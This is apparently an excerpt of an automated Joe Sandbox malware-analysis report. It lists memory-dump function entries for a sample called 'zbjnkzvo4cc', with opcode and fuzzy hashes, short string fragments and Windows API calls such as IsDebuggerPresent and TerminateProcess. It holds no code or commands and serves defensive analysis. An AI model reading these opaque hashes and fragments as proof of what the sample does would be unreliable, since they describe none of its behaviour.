                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HI$]ik$jqrs$ojz.$|xtr
                                                                                                                                                            • API String ID: 0-1770020635
                                                                                                                                                            • Opcode ID: 835fecbbfd96b503f6d2c9d740594ae70688cbec589e98be2f006d9802251770
                                                                                                                                                            • Instruction ID: 75be8de98519367eff48410919dea114501b3933ba3ef89b0d89fca5db0a5a1e
                                                                                                                                                            • Opcode Fuzzy Hash: 835fecbbfd96b503f6d2c9d740594ae70688cbec589e98be2f006d9802251770
                                                                                                                                                            • Instruction Fuzzy Hash: 24D1057164C3818BD314CF29C4D136FBBE2ABD6354F68892CE4E54B355EA75880ADF82
                                                                                                                                                            APIs
                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 68C01616
                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 68C016E2
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 68C01702
                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 68C0170C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                            • Opcode ID: 1ed8eba3e153e1a907a150e356613ac628465478c335f1045e10fa635cec1fc2
                                                                                                                                                            • Instruction ID: ea1f41bd746088cf10b2172b0af5801afe6f438ca2c6fcd96d31dda8a8da761d
                                                                                                                                                            • Opcode Fuzzy Hash: 1ed8eba3e153e1a907a150e356613ac628465478c335f1045e10fa635cec1fc2
                                                                                                                                                            • Instruction Fuzzy Hash: 3C311AB5D0521CDBDF10DFA8D9897CDBBB8FF08348F50419AE509A7240EB719A858F44
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -y{$XY$nhfn$nhfn
                                                                                                                                                            • API String ID: 0-2084749428
                                                                                                                                                            • Opcode ID: ed48a5036b80e843f537e818f440342e18c357097157aace08b6ebb63e5a4be7
                                                                                                                                                            • Instruction ID: 3def4f6659103fe6ee9996b74bb19b8e8f9cc5aef47f07a854a34e267b485306
                                                                                                                                                            • Opcode Fuzzy Hash: ed48a5036b80e843f537e818f440342e18c357097157aace08b6ebb63e5a4be7
                                                                                                                                                            • Instruction Fuzzy Hash: 62C1D0B150C3408FD718CF34D89476BBBE5EB82318F644A2DE5E18B292E735C50ACB96
                                                                                                                                                            APIs
                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 68C04092
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 68C0409C
                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 68C040A9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                            • Opcode ID: 038acab5ded4308dfcf3b978c7cb0c866ed4b056ed21467866f6af0ddc7e26ed
                                                                                                                                                            • Instruction ID: 0589afd89c513d76a89c71a29a49d834c85dc3d19162ed4452caf547d5736d8b
                                                                                                                                                            • Opcode Fuzzy Hash: 038acab5ded4308dfcf3b978c7cb0c866ed4b056ed21467866f6af0ddc7e26ed
                                                                                                                                                            • Instruction Fuzzy Hash: 1331C57490122CEBCB21DF68D9887DDBBB8BF08354F6042DAE41CA7250EB719B858F44
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,68C02D94,?,00000001,?,?), ref: 68C02DB7
                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,68C02D94,?,00000001,?,?), ref: 68C02DBE
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 68C02DD0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                            • Opcode ID: 75fffb6bc922d4d550bb0f54cdbd4845a534e521c9c77b3b1e6fbf0354d89ab6
                                                                                                                                                            • Instruction ID: 3ef8659cdebaced05d3a07fcb2141c2da934131e141aef607d8dc6a82b75fe47
                                                                                                                                                            • Opcode Fuzzy Hash: 75fffb6bc922d4d550bb0f54cdbd4845a534e521c9c77b3b1e6fbf0354d89ab6
                                                                                                                                                            • Instruction Fuzzy Hash: 5CE08C31000208EFCF12AF68C928E5D3B39FB056C9F614828F82996220DB77DD82CB90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #:EX$/:EX$|
                                                                                                                                                            • API String ID: 0-1498014989
                                                                                                                                                            • Opcode ID: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                                                                                                            • Instruction ID: 4c0f46a8fa1863cfca30d843e8e30ca25886d3ba721ab4b78e5ddc6edc39ca31
                                                                                                                                                            • Opcode Fuzzy Hash: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                                                                                                            • Instruction Fuzzy Hash: FF515571518391CBD304CF25C8616ABBBF1EFD3344F98995CE8D29B690E3788901C796
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \^$fW
                                                                                                                                                            • API String ID: 0-3607370474
                                                                                                                                                            • Opcode ID: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
                                                                                                                                                            • Instruction ID: e00f8996aba883b6308c20629df49967e09a4b7464ea87aed4d1ada0f4abe448
                                                                                                                                                            • Opcode Fuzzy Hash: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
                                                                                                                                                            • Instruction Fuzzy Hash: 58C14EB0A103049FE354DF56D989BA97FB2FB46210F6A81EAD4986F376D7308401CF96
                                                                                                                                                            APIs
                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 68C017EE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                            • Opcode ID: ea42c45ce9a46caaa72f925a0965240ae88f8f9ca4e5ba5032710b8eb344023a
                                                                                                                                                            • Instruction ID: abc6ef34f02e2018a3cf6738aa2b068f4f3893fbed35aa2c92f8bdfd5c6185d8
                                                                                                                                                            • Opcode Fuzzy Hash: ea42c45ce9a46caaa72f925a0965240ae88f8f9ca4e5ba5032710b8eb344023a
                                                                                                                                                            • Instruction Fuzzy Hash: 835156B1E11205CBEB09CF9AC4817AEBBF1FB48354F54852AC425FB241E3B6DA51CB90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ~
                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                            • Opcode ID: 5ad8097ea417537e8e26a4425c28b63f33e2e653fd6cb2403d581c758a2a988b
                                                                                                                                                            • Instruction ID: f03169813be06f9941bab8abdb4670f7eeb211cc18e97df2379e8b1893dea4dc
                                                                                                                                                            • Opcode Fuzzy Hash: 5ad8097ea417537e8e26a4425c28b63f33e2e653fd6cb2403d581c758a2a988b
                                                                                                                                                            • Instruction Fuzzy Hash: F3B1307550D3D18BD330CF29D4983ABBBE1AFD6304F18495CC4E99B252EB39810ADB92
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !%
                                                                                                                                                            • API String ID: 0-2252526427
                                                                                                                                                            • Opcode ID: 2a788cfdf38129ccc9b02290225b1bb5692e1630fce21d44a7a59086e337632e
                                                                                                                                                            • Instruction ID: 5e9da14c6cfc064ea3efb55996847ab0c8e39ad77d903dd267713ab697b2c52b
                                                                                                                                                            • Opcode Fuzzy Hash: 2a788cfdf38129ccc9b02290225b1bb5692e1630fce21d44a7a59086e337632e
                                                                                                                                                            • Instruction Fuzzy Hash: A2A19A3295D3908AD3208F68E8897EBB7E1EFD5314F188A7CC8C997255EB784506C786
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: >>
                                                                                                                                                            • API String ID: 0-1736523924
                                                                                                                                                            • Opcode ID: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
                                                                                                                                                            • Instruction ID: 8c22f3b749ba61e7df62292b1d11dc53414bbd752d2de602c20e7b06a249accc
                                                                                                                                                            • Opcode Fuzzy Hash: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
                                                                                                                                                            • Instruction Fuzzy Hash: A1D152B0A10305DFE7149F56D989FA97BB1FB01344F1A86E9C0986F366D738804ACF95
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5W7Q
                                                                                                                                                            • API String ID: 0-53030636
                                                                                                                                                            • Opcode ID: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
                                                                                                                                                            • Instruction ID: 7875e09dbedbbae49762baa92c1ff87bfdc69a8d397a423ab54e798c62d1cd2c
                                                                                                                                                            • Opcode Fuzzy Hash: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
                                                                                                                                                            • Instruction Fuzzy Hash: A6815BB6E142208BC704CF19C8C166BBBB2FF95304B5A919DDD91AF359E7789802CB94
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: D
                                                                                                                                                            • API String ID: 0-2746444292
                                                                                                                                                            • Opcode ID: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
                                                                                                                                                            • Instruction ID: 5ca30681f5d4f43a21008ed0667e67190690f1035ca1f17963d56a8834da7a03
                                                                                                                                                            • Opcode Fuzzy Hash: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
                                                                                                                                                            • Instruction Fuzzy Hash: F4B1FEB44183909BE3208F51D49935BBBF1FF86788F509A0CE4D92B764D7BA8506CF86
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                            • Opcode ID: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
                                                                                                                                                            • Instruction ID: 2ab5166c7a4d87afc1c16c98af513bb5909111fb5764b034761a965e43ecbac7
                                                                                                                                                            • Opcode Fuzzy Hash: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
                                                                                                                                                            • Instruction Fuzzy Hash: 7C416672A082018BEB04CF24C86167B73F2FFD5318F54852CE4A59B391EB34992AC7D6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5|iL
                                                                                                                                                            • API String ID: 0-1880071150
                                                                                                                                                            • Opcode ID: 4a0d2ac823cf73de7bab280278e5870a3414b3ba8f484ff9ffce97148325ed08
                                                                                                                                                            • Instruction ID: 9c38eafc572c23e8254af020ea33774051d8c2a48a1b85937b9fd4db2a124dc8
                                                                                                                                                            • Opcode Fuzzy Hash: 4a0d2ac823cf73de7bab280278e5870a3414b3ba8f484ff9ffce97148325ed08
                                                                                                                                                            • Instruction Fuzzy Hash: DC416A386083019FE701DF65CC50B37B3E2FB89715F50852CE69497251E7B1A971C78A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                            • Opcode ID: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
                                                                                                                                                            • Instruction ID: 32a4da97bb89045d72e0676dca80fd1b06a79f7c8f057b57e88a958097a42786
                                                                                                                                                            • Opcode Fuzzy Hash: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
                                                                                                                                                            • Instruction Fuzzy Hash: 9831FE751083008FC304DFA4D8C062BB7F5FB8A354F40892DEA948B290E7759529CB9A
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                            • Opcode ID: 092a740264d4b4e42454b18365805907feea5bf8c2bdfc662fab8e321fee3dad
                                                                                                                                                            • Instruction ID: 4626e47d502646ce9764e05892ca104d5f032bee3931c2aef9ed94fbdaeb49d1
                                                                                                                                                            • Opcode Fuzzy Hash: 092a740264d4b4e42454b18365805907feea5bf8c2bdfc662fab8e321fee3dad
                                                                                                                                                            • Instruction Fuzzy Hash: 06A01130A002008B8B808E32828820E3AB8AA022C2B0A00A8A000E0000EAA0C0E0AA80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c0478513e9e3b50926b6c25ba14857a2fe4ee7476300e5b012235f8d430b5382
                                                                                                                                                            • Instruction ID: 270b1d6fb608b8d8db27f9e81467cca7200466e07c6e3c89547f22ab0c21fdfc
                                                                                                                                                            • Opcode Fuzzy Hash: c0478513e9e3b50926b6c25ba14857a2fe4ee7476300e5b012235f8d430b5382
                                                                                                                                                            • Instruction Fuzzy Hash: 1042D33164C7158BC311DF28E8D0AAAB3E1FFC4315F958A2DD9E587280E738E856D742
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d001ee3fa9407732dc6a46a27d13c36f92bd168f46764626096062e58005f181
                                                                                                                                                            • Instruction ID: d8d34a3ba665a1e355c9b5a05ad5ad8c730607707c188a9c9b83743728d3575e
                                                                                                                                                            • Opcode Fuzzy Hash: d001ee3fa9407732dc6a46a27d13c36f92bd168f46764626096062e58005f181
                                                                                                                                                            • Instruction Fuzzy Hash: 69C148B29487418FC360CF28C896BABB7F0BF85318F48492DD5E9C7242E738A155DB46
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9014fafaedb5255517029e815f517c8f6aa2d48da45b9c66504435eac8c71f5c
                                                                                                                                                            • Instruction ID: 4789ddea1b420e2abce80e4ca2d8d8423904babf3dd1332fc7897ee15a4b38d7
                                                                                                                                                            • Opcode Fuzzy Hash: 9014fafaedb5255517029e815f517c8f6aa2d48da45b9c66504435eac8c71f5c
                                                                                                                                                            • Instruction Fuzzy Hash: 36818A3A7493109BD7188B28CCA162AB7E2FB85314F9E453ED4EAD7790E2718C038785
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
                                                                                                                                                            • Instruction ID: d5f197819330edcc8251b076142170af4bb0033e9036350e4ec01f96162ff24d
                                                                                                                                                            • Opcode Fuzzy Hash: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
                                                                                                                                                            • Instruction Fuzzy Hash: 8A314475E19305DAD300DF2CC8A5A23B3F5EF95360F499A28F8A58B2C1FB788904C395
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
                                                                                                                                                            • Instruction ID: 38acc4841717a2ae36e744ebfb1ffc82d2a33af60b303e20c330d03f98b13a03
                                                                                                                                                            • Opcode Fuzzy Hash: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
                                                                                                                                                            • Instruction Fuzzy Hash: E621D33524C3519BE3048F64E89575FBBB1EBC2704F05892CE1D56B2D1C7B5990A8B86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
                                                                                                                                                            • Instruction ID: 99d9781a3106a484f61149a01fc8f982dfbeca3a644b7d2a61bdc6653043eafe
                                                                                                                                                            • Opcode Fuzzy Hash: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
                                                                                                                                                            • Instruction Fuzzy Hash: 7FF0BB7F75D6560BB314DDF998E0627F3D6E7DA244F064038EB90D3611E560E4029194
                                                                                                                                                            Memory Dump Source
